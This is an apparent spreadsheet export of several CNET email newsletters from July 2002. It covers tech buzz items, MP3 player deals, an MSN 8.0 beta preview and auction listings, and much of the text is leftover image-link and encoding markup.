\n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL] **See all most popular\nnotebooks**  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL]  \n  \n\n![Software]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**PIMs on the side**  \nWhatever happened to the straightforward, dedicated PIM? PIM/contact managers,\nsuch as the ubiquitous Outlook and Lotus, pushed them to the sidelines. But a\nfew PIMs survived this enforced obscurity. If you need a plain PIM that\ndoesn't cost a fortune, one of these may tickle your fancy. More software  \n\n![Hardware]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Apple eMac not just for education anymore**  \nIdeally suited to students living in small spaces and home users with basic\nneeds, the eMac is an attractive, adequately speedy, and easy-to-use PC\nwithout the flat-panel iMac's relatively high price. Wondering whether to go\nCRT or flat-panel? Read our review. More desktops  \n**Read the review |  Check latest prices**  \n\n![Electronics]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**MiniDV maestro**  \nSony's DCR-VX2000 gives prosumers a versatile tool for capturing high-quality\ndigital video. With three CCDs, smooth performance, and excellent low-light\ncapability, this camcorder meets the demands of avid videographers where\nlesser cameras fail. More in digital photo  \n**Read the review |  Check latest prices**  \n\n![Wireless]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n**Cordless phones: the other wireless devices**  \nIn the market for a new cordless phone but don't know whether to buy a 900MHz\nor 2.4GHz model or which manufacturers offer the best products? No sweat:\ncheck out our new line coverage to find the phone that fits your personal\nstyle and needs. More in wireless phones  \n\n  \n![Buzz Meter]([URL]http://www.cnet.com[/URL] | **  Readers mourn Gene\nKan**| ![]([URL]http://www.cnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nPeer-to-peer pioneer dies, Macworld kicks off in Manhattan, and the\nPayPal/eBay merger is not going so well.  \n_\--Laura Lindhe, executive editor, CNET Tech Trends_\n\n**1** | **Gene Kan:**  \nGnutella open-source guru Gene Kan, who died on June 29 in an apparent\nsuicide, was clearly beloved by the CNET community. Last week, search requests\nfor information on 25-year-old Kan far outweighed the kind of requests on\nproducts and companies I usually see. A pioneer in the peer-to-peer space,\nmany credit him with legitimizing file sharing--making it about more than\nmusic, according to Wired News.  \n---|---  \n**2** | **Macworld:**  \nThe annual Apple lovefest in New York is always a good show, whether or not\nSteve Jobs has anything real to announce. So far, it looks like Apple has\nalready surprised a few by announcing the release of QuickTime 6.0 (see No.\n7), which many thought would get bogged down in a licensing quagmire.  \n**3** | **PayPal:**  \nIt's been a rocky road thus far for the eBay and PayPal deal. Soon after eBay\nannounced it was buying PayPal for $1.5 billion, shareholders filed a lawsuit\nclaiming that PayPal's price tag was too low. This week, PayPal is being\nsubpoenaed by the New York attorney general in regard to its involvement with\nonline gambling transactions.  \n**4** | **Wi-Fi:**  \nI'm just going to leave this common term for 802.11 up on the Buzz Meter\npermanently. This time, Wi-Fi is getting interest because of a possible pact\nbetween tech heavyweights, including Intel, AT&amp;T Wireless, and Verizon\nCommunications, to build wireless access places across the nation in public\nareas where people would want to launch onto the Net, such as airports.  \n**5** | **eMac:**  \nThis is the for-education-only computer that consumers wanted so badly that\nApple released it to them. The CNET review is out, and here's the word: the\neMac is what the iMac used to be. Basically, it's an easy-to-use, fairly\ninexpensive computer for users who don't need to do much besides word\nprocessing and accessing the Web.  \nFor more Buzz, click here.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zdnet@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04-02&amp;ISSUE=2002-07-18)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://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cnet-newsletters@example.com\nFrom: CNET Shopper Newsletter Alerts &lt;Online#3.20510.39-CTjLgE3RyAhaFsRR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 16:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 16:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Shopper Newsletter Alerts &lt;Online#3.20510.39-CTjLgE3RyAhaFsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Great deals on the Summer's hottest MP3 players (CNET SHOPPER)</t>
  </si>
  <si>
    <t>![CNET Shopper Newsletter\nAlerts]([URL]http://www.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n|  ![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n|  \n---  \n  \n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://www.techrepublic.com[/URL]\n\n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |  |  |  |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \nJuly 18, 2002 | ![]([URL]http://www.cnet.com[/URL] | **From\nComputers4Sure.com**  \niRiver's versatile SlimX just $149  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] | **From CDW**  \nApple's groundbreaking iPod just $399  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n\n**Computers4Sure** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **iRiver SlimX iMP-350**  \nÂ• Ultra-slim, 16.7mm in width  \nÂ• Supports MP3/WMA/ASF/CD formats  \nÂ• Rechargeable batteries included  \n   **Just $149**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Sonicblue Rio Riot**  \nÂ• Stores over 400 complete albums  \nÂ• Built-in FM tuner/custom presets  \nÂ• Extra-large, backlit LCD  \n   **Just $300**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **TDK Mojo CD-MP3**  \nÂ• Play up to 10 hours of music  \nÂ• 8-minute MP3 skip protection  \nÂ• Supports MP3, Audio CD  \n   **Just $125**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Sonicblue Rio 600 (32MB)**  \nÂ• Customize your music!  \nÂ• 32MB, supports MP3 and WMA  \nÂ• USB, PC/Mac compatible  \n   **Just $97**  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n\n**CDW** |\n\n![]([URL]http://shopper.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Apple iPod**  \nÂ• 5 Gig capacity  \nÂ• 3x optical/2.5 digital zoom  \nÂ• 6.5 oz  \n   **Just $299**  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Sonicblue Rio One (32 MB)**  \nÂ• Affordable MP3 player!  \nÂ• 32MB, USB, Mac/PC comp.  \nÂ• Upgradeable w/flash memory  \n   **Just $100 **  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://shopper.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  **Imation RipGo**  \nÂ• Palm-sized CD-R Drive  \nÂ• Plays CD, WMA, MP3, D-Audio  \nÂ• 6 hours WMA, 3 hours MP3  \n   **Just $199 **  \n![]([URL]http://www.cnet.com[/URL]  \n  \n  \n  \n  \n  \n  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  ![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-cnet-\nnewsletters@example.com\n\nUnsubscribe |  Manage My Subscriptions  | FAQ |  Advertise  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved.**\n\n|\n\n![](http://gserv-\ncnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e443&amp;ISSUE=2002-07-18)  \n  \n---|---  \n.  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://i.i.com.com http://www.techrepublic.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shopper.cnet.com http://www.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www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.cnet.com http://www.cnet.com http://www.cnet.com http://shopper.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www.cnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Internet Services &lt;Online#3.20506.f1-z6nDl-c_EcoBf9RR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 15:52:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 15:52:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Internet Services &lt;Online#3.20506.f1-z6nDl-c_EcoBf9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>MSN 8.0 on deck and on a roll, CyberSLAPPs explained (CNET INTERNET SERVICES)</t>
  </si>
  <si>
    <t>![3D"Internet](3D"[URL]http://www.cnet.co[/URL]   =09=09=09 =09=09=09=09| ![](3D"http://home=)      ---   =09=09=09=09 =09=09=09=09=09![](3D"ht=)   =09=09=09=09=09| ![](3D"[URL]http://home.cnet.com[/URL]   =09=09=09=09=09| ![](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09=09   =09=09=09=09![](3D"[URL]http://home.cnet.com[/URL]      =09=09=09 =09 =09 =09=09![](3D"[URL]http://home.cnet.com[/URL]")   =09=09 =09=09|      ---   =09=09 ![](3D"[URL]http://i.i.com.com[/URL] =20 ![](3D"[URL]http://www.techrepublic.com[/URL]    ![3D"Most](3D"[URL]http://www.cnet.com[/URL]")   **Reseller Accounts**    **1.**  Infinology Corp., $59   = **2.**  ReadyHosting.com, $4.12    **3.** =  Aplus.Net, $79.95    **4.**  One World Hosting, $10    **5.**  Superb Internet, $5       **More providers**   &lt;= /tr&gt;   | ![](3D"[URL]http://www.cnet.com[/URL]   =09| ![](3D"[URL]http://www.cnet.com[/URL]")   ---   =09![](3D"[URL]http://www.cnet.com[/URL]")   =09![](3D"[URL]http://www.cnet.com[/URL]")   =09 =09| ![](3D"[URL]http://www.cnet.com[/URL]")   ---   =09![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL]   =09| ![](3D"[URL]http://home.cnet.com[/URL] =09|  =09=09 =09=09=09 =09=09=09| ![3D""](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09|  =09=09 =09=09=09![](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09![](3D"[URL]http://home.cnet.com[/URL]")July 18, 2002   =09=09=09![](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09=09 =09=09=09=09 =09=09=09=09=09| =09=09=09=09=09=09![](3D"[URL]http://a.r.tv.com[/URL]   =09=09=09=09=09=09 \--Lindsey Turrentine   Senior editor   CNET Software and Internet   =09=09=09|  =09=09=09|  =09=09=09 **Dear Readers,**   =09=09=09 On the surface, it seems odd that Microsoft and AOL compete with one another. After all, while Microsoft is a giant software powerhouse, AOL Time Warner is totally different--a giant media powerhouse. Nonetheless, they're at it again, working like crazy to dominate the ISP space. While AOL is busy renovating the guts of upcoming AOL 8.0, which will finally integrate the Netscape browser, Microsoft is nipping at its competition's heels with MSN 8.0. Will Microsoft make enough improvements to finally catch up with AOL? It just might. Find out more in our **MSN 8.0 First Take**. =09=09 =09=09=09   ---|---|---   =09=09=09=09 =09=09=09=09 =09=09=09=09![3D""](3D"[URL]http://home.cnet.com[/URL]")   =09=09=09   =09=09 =09  =09=09 | ![3D"advertisem=](3D"[URL]http://www.cnet.com[/URL]   ---   &lt;= b class=3D"v1"&gt; **Quick links to Services &amp; Prices from these companies**      =09=09 =09=09  =09=09  =09=09 |  =09=09  =09=09 |  =09=09  =09=09 |  =09=09   =09  =20 =09   =09 =09 =09 =09=09![](3D"[URL]http://home.cnet.com[/URL]") =09   ---   =09 =09   ---   =09=09=09 ![3D"Review"](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://home.cnet.com[/URL]")   **This week in Internet Services**   Ever heard of a type of lawsuit known as a _cyberSLAPP_? We hadn't eit= her. A cyberSLAPP case typically involves "a person who has posted anonymous criticisms of a corporation or public figure on the Internet," according to a coalition of privacy groups who are fighting to stop the practice. Find out more. **First Take: MSN 8.0 Beta**   Redmond has been talking up the newest version of MSN for months, and now, the proof"s in the pudding. Testers have their hands on the beta of MSN 8.0, and so far, this ISP looks and works better than past versions. The great No. 8 even has antispam tools and improved parental controls. But will MSN topple AOL? **First Take: ICQ Lite Alpha**   One of our biggest beefs with ICQ has always been its bloated feature set. Now, the company has released a new lite ICQ that sucks up far less system memory than the full-fat version--but at what cost? We take an early look. ![3D"The](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://www.cnet.com[/URL]")   **Looking for a new DSL provider?**   The DSL Power Search makes it easier to find the perfect broadband provider for your needs. With our search, you can identify the DSL providers in your neighborhood, then compare prices and plans to make sure your new connection meets with your objectives without breaking your budget.      ![3D"This](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://www.cnet.com[/URL]")   ****Don't type that: Yahoo edits e-mail****   Yahoo's filter hunts for words that could activate JavaScript, then it replaces them.   **Scient files for Chapter 11=20**   The Internet consultancy and former highflier is also selling certain assets to SBI and Company, a professional services firm.   ![3D"Tip](3D"[URL]http://www.cnet.com[/URL]")   ![](3D"[URL]http://www.cnet.com[/URL]")   **Online undercover!**   Unless you observe the proper safety rules, surfing the Net could land you in hot water. These simple tips can help.      ![3D"On](3D"[URL]http://home.cnet.com[/URL]")   ![](3D"[URL]http://home.cnet.com[/URL]")   | **   * Tech Trends   * Hardware   * Software   * Shopping   * Downloads  **| **   * News   * Investing   * Electronics   * Web Building   * Help &amp; How-Tos  **| **   * Internet   * Games   * Message Boards   * CNET Radio   * Music Center  **   ---|---|---   =09 =09 =09 =09|  =09|  **Search =09|  =09|  =09 Internet Services =09All CNET =09The Web=09 =09 =09|  = =20 =09 =09   ---|---|---|---|---   =09=20 =09   =20  ![](3D"[URL]http://home.cnet.com[/URL]")   =09=09 =09   =09![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL]   ---|---|---|---|---   =09![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL] =09| ![](3D"[URL]http://home.cnet.com[/URL]   ---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]"=) | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL] | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL] | ![](3D"[URL]http://www.cnet.com[/URL]"=) | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]")   ![3D"Sign](3D"[URL]http://a.r.tv.com[/URL]")&lt;= br&gt;  The e-mail address for your subscription is qqqqqqqqqq-cnet-newsletter= s@example.com Unsubscribe |  Manage My Subscriptions  | FAQ |  Advertise   ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---|---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]"=) | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---   ![](3D"[URL]http://www.cnet.com[/URL] | ![](3D"[URL]http://www.cnet.com[/URL]") | ![](3D"[URL]http://www.cnet.com[/URL]") |  Price comparisons | Product reviews | Tech news | Downloads | All CNET services | ![](3D"[URL]http://www.cnet.com[/URL]")   ---|---|---|---|---   ![](3D"[URL]http://www.cnet.com[/URL]")   ---   |    **Copyright 2002 CNET Networks, Inc. All rig= hts reserved.** | ![](3D"[URL]http://gserv-cnet.zdnet.com[/URL] =      ![](3D"[URL]http://clickthru.online.com[/URL]</t>
  </si>
  <si>
    <t>http://www.cnet.co http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://i.i.com.com http://www.techrepublic.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://a.r.tv.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.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gserv-cnet.zdnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: CNET Auctions &lt;Online#3.20502.53-KAuEgBlRpyKZc9RR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 15:45:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 15:45:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>CNET Auctions &lt;Online#3.20502.53-KAuEgBlRpyKZc9RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Olympus Brio D-100 1.3 MegaPixel Digital Camera: Starting Bid $99</t>
  </si>
  <si>
    <t>![Auctions Weekly Newsletter]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n|  \n---  \n![CNET Search.com]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://cnet.com[/URL]  \n  \nAuctions All CNET T he Web  \n---  \n  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n**Site Map  \nÂ•  Desktops  \nÂ•  Notebooks  \nÂ•  Components  \nÂ•  Software  \nÂ•  Input Devices  \nÂ•  Networking  \nÂ•  Handhelds  \nÂ•  Printers  \nÂ•  Memory  \nÂ•  Storage  \nÂ•  Electronics  \nÂ•  Monitors  \nÂ•  Modems  \nÂ•  Scanners  \nÂ•  Services  \nÂ•  Digital Cameras  \nÂ•  Accessories  \nÂ•  Multimedia  \n**![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n| ![]([URL]http://www.cnet.com[/URL]  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  |       **July 18th, 2002**  \n---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL]\n\n|\n\n|  \n\n**_ Olympus Brio D-100 1.3 MegaPixel Digital Camera_  **  \n---  \n  \n\n  * **1.3 MegaPixel Resolution**\n  * **8MB Smartmedia Card**\n  * **Seamless 2X Digital Zoom**\n  * **1280 x 960 Pixel Resolution**\n  * **Auto Connect USB Function**\n  * **Olympus TruePic Technology**\n\n|\n\n|  ![]([URL]http://auctions.cnet.com[/URL]  \n---  \n  \n**Bidding starts at $99 **  \n** _Don't miss out, place your bid now!_**  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL] ![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n  \n\n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n---  \n![]([URL]http://auctions.cnet.com[/URL] |    |\n**Kodak/Lexmark 1200dpi Printer  \nw/FlashCard Reader &amp; Photo LCD**  \n  \nÂ• Starting Bid **$49**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Lexmark\nZ-82 Color Copier/Scanner/Printer Combo**  \n  \nÂ• Starting Bid **$1**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Gateway XP\nP4 1.5GHz/256MB PC-266/64MB AGP  \n40GB 7200RPM/24x10x40x CD-RW PC**  \n  \nÂ• Starting Bid **$551**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Sony/Sun\n.28mm 20-inch Trinitron Monitor**  \n  \nÂ• Starting Bid **$9**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |\n**Hand Held Security Wand Metal Detector**  \n  \nÂ• Starting Bid **$16.50**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Intel\n900MHz/256MB PC-133/10X DVD-ROM/20GB PC**  \n  \nÂ• Starting Bid **$229**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n---  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Canon\nCanoScan N670U 48-Bit Flatbed Scanner**  \n  \nÂ• Starting Bid **$1**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **P4\nCeleron 1.7GHz/nVidia 32MB  \n256MB PC-133/16x DVD/20GB PC**  \n  \nÂ• Starting Bid **$399**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |\n**Creative Sound Blaster Live! 5.1 Sound Card**  \n  \nÂ• Starting Bid **$1**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n---  \n![]([URL]http://auctions.cnet.com[/URL] |    |\n**Creative Blaster 56K PCI V.92 Fax Modem**  \n  \nÂ• Starting Bid **$17.75**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |\n**Iomega Predator 4x4x6 External USB CD-RW**  \n  \nÂ• Starting Bid **$49.99**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **NEC\n21-inch .28mm Multi-Sync Monitor**  \n  \nÂ• Starting Bid **$9**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nPlease send all questions, comments, and concerns regarding the CNET Auctions\nNewsletter to auctions@cnet.com and include the Newsletter title in the\nsubject line.\n\n**NOTE:** All product information, including prices, features, and\navailability, is subject to change without notice.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URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://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uctions.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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www.cnet.com http://www.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www.cnet.com http://www.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zdnet@example.com\nFrom: "CNET News.com Investor" &lt;Online#3.20504.8b-aopnlJ_w_jjk69RR.1@newsletter.online.com&gt;\nDate: Thu, 18 Jul 2002 15:29:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 18 Jul 2002 15:29:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com Investor" &lt;Online#3.20504.8b-aopnlJ_w_jjk69RR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>NEWS.COM INVESTOR: Techs lose again with Seibel earnings miss, AOL questions</t>
  </si>
  <si>
